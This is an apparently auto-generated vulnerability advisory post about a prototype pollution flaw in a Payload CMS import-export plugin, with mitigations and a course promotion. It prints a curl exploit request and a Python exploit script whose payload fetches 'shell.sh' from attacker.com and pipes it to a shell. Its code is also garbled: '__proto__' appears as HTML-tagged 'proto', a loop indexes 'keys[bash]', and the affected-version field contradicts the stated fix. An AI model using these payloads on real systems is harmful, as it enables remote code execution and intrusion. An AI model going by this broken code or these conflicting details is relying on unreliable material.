Payload CMS, Prototype Pollution, CVE-2026-105844 (Critical) -DC-Oct2026-2762

Listen to this Post

Prototype pollution is a vulnerability that occurs when an attacker can inject properties into a JavaScript object’s prototype, affecting all objects that inherit from that prototype. In the context of Payload CMS, the `@payloadcms/plugin-import-export` plugin fails to properly sanitize field paths submitted during import operations. This allows an unauthenticated attacker to submit a specially crafted request containing prototype-sensitive field paths, such as `__proto__` or constructor.prototype. When the plugin processes these paths, it merges the attacker-controlled data into the global Object.prototype. This pollution can then alter the behavior of the entire application, as all objects inherit from the polluted prototype. The most severe consequence is remote code execution (RCE). By polluting properties that are later used in dangerous functions like `eval()` or child_process.exec(), an attacker can execute arbitrary system commands on the server. The vulnerability affects versions `>= 3.0.0, < 3.88.0` and >= 4.0.0-canary.0, < 4.0.0-canary.27. Applications not using the Import Export plugin are not affected. The fix is available in versions `>= 3.88.0` and >= 4.0.0-canary.27.

DailyCVE Form:

Platform: Payload CMS
Version: 3.0.0–3.88.0
Vulnerability: Prototype Pollution
Severity: Critical
date: 2026-09-22

Prediction: 2026-10-06

What Undercode Say:

Check if the vulnerable plugin is installed
npm list @payloadcms/plugin-import-export
Example of a malicious import payload that pollutes Object.prototype
curl -X POST https://target.com/api/import-export/import \
-H "Content-Type: application/json" \
-d '{
"collection": "users",
"data": [
{
"<strong>proto</strong>": {
"polluted": "true",
"exec": "require(\"child_process\").execSync(\"id\")"
}
}
]
}'
// Snippet illustrating how the plugin merges field paths unsafely
function setValue(obj, path, value) {
const keys = path.split('.');
let current = obj;
for (let i = 0; i < keys.length - 1; i++) {
const key = keys[bash];
if (!current[bash]) current[bash] = {};
current = current[bash];
}
current[keys[keys.length - 1]] = value;
}
// Attacker-controlled path: "<strong>proto</strong>.polluted"
setValue({}, "<strong>proto</strong>.polluted", "true");
console.log({}.polluted); // "true" — Object.prototype is polluted

Exploit: (Educational Purposes!)

import requests
import json
target = "https://vulnerable-payload-instance.com"
endpoint = f"{target}/api/import-export/import"
payload = {
"collection": "users",
"data": [
{
"<strong>proto</strong>": {
"shell": "/bin/sh",
"argv": ["-c", "curl http://attacker.com/shell.sh | sh"],
"env": {"NODE_OPTIONS": "--require /proc/self/environ"}
}
}
]
}
headers = {
"Content-Type": "application/json"
}
Send the malicious import request
response = requests.post(endpoint, data=json.dumps(payload), headers=headers)
print(response.status_code)
print(response.text)

Protection: from this CVE

  • Upgrade `@payloadcms/plugin-import-export` to version `>= 3.88.0` or >= 4.0.0-canary.27.
  • If upgrading is not immediately possible, disable the Import Export plugin.
  • Restrict access to the plugin’s import/export endpoints using authentication and authorization controls.
  • Implement input validation to reject field paths containing __proto__, constructor, or prototype.
  • Use `Object.create(null)` or `Map` for data structures that do not require prototype inheritance.

Impact:

  • Confidentiality: High — an attacker can read sensitive data stored in the application.
  • Integrity: High — an attacker can modify application behavior and data.
  • Availability: High — an attacker can execute arbitrary code, potentially leading to full system compromise.
  • CVSS Score: 9.3 (Critical).

🎯Let’s Practice Exploiting & Learn Patching For Free:

🎓 Live Courses & Certifications:

Join Undercode Academy for Verified Certifications

🚀 Request a Custom Project:

Secure, high-velocity infrastructure and disruptive technological engineering. Contact our engineering team for high-tier development and proprietary systems:
[email protected]
💎 Smart Architecture | 🛡️ Secure by Design | ⭐ Trusted by Thousands

Sources:

Reported By: github.com
Extra Source Hub:
Undercode

🔐JOIN OUR CYBER WORLD [ CVE News • HackMonitor • UndercodeNews ]

💬 Whatsapp | 💬 Telegram

📢 Follow DailyCVE & Stay Tuned:

𝕏 formerly Twitter 🐦 | @ Threads | 🔗 Linkedin Featured Image

Scroll to Top